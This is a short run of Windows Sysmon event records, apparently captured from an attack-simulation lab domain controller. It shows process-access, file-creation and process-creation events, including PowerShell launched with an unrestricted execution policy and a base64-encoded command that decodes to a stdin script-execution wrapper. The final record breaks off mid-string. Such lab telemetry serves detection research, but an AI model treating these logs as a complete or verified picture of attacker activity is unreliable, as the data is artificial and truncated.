{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4386,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.095\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.095","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4387,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.095\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nProcessId: 2176\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dzt4bruc.yoi.ps1\r\nCreationUtcTime: 2020-08-01 07:58:51.095","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.095","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010AE650600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dzt4bruc.yoi.ps1","CreationUtcTime":"2020-08-01 07:58:51.095","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4388,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.142\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.142","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4389,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.142\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.142","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4390,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.200\r\nProcessGuid: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nProcessId: 1632\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nParentProcessId: 2176\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.200","ProcessGuid":"{41C8662E-20BB-5F25-0000-0010A2710600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20BB-5F25-0000-0010AE650600}","ParentProcessId":"2176","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUA